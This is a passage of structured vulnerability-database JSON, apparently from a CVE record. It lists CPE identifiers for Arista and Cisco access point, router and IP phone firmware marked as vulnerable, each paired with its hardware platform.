                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-250:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-260_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-260:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-65_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-65:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:c-75_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:c-75:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:o-105_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:o-105:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:o-90_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:o-90:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:w-118_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:w-118:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:arista:w-68_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:arista:w-68:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1100_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1100:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1100-4p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1100-4p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1100-8p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1100-8p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1101-4p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1101-4p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1109-2p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1109-2p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:1109-4p_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:1109-4p:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1532_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1532:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1542d_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1542d:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1542i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1542i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1800_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1800:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1800i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1800i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1810_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1810:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1810w_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1810w:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1815_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1815:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1815i_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1815i:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1832_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1832:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1842_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1842:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_1852_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_1852:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_ap803_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_ap803:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:aironet_iw3702_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:aironet_iw3702:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9105_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9105:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9105axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9105axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9105axw_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9105axw:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115axe_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9115axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9115axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9117_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9117:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9117_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9117_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9117axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9117axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120axe_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9120axp_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9120axp:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9124_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9124:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9124axd_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9124axd:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9124axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9124axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130_ap_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130_ap:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130axe_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130axe:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:catalyst_9130axi_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:catalyst_9130axi:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_6861_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_6861:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8821_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8821:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8832_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8832:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:cisco:ip_phone_8861_firmware:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:cisco:ip_phone_8861:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          },
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
